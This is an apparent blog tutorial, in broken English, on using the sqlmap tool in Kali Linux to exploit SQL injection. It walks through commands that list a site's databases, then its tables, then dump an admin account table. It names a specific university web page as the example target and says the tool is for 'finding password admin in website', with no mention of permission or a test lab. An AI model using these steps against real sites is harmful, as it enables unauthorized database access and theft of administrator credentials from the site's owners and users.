How to using sqlmap tool in kali linux

Do you know tool sqlmap in kali linux?
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

For simple definition is sqlmap can using for finding password admin in website.

Prepare
-Connection

To start follow this introction.
Open terminal and open sqlmap.

sqlmap

sqlmap -u (sites target) --dbs

Change (sites target) to website containing vulnerability
For example :

sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 --dbs

After finding Database, select one of database for finding tables

sqlmap -u (sites target) -D (database) --tables

Change (database)
For example :

sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 -D unsbersih --tables

After finding tables choose admin account

sqlmap -u (sites target) -D (database) -T (admin_account) --dump

For example :

sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 -D unsbersih -T admin --dump

For more information watch this video.

Labels: Database Assessment, linux, Web Application Analysis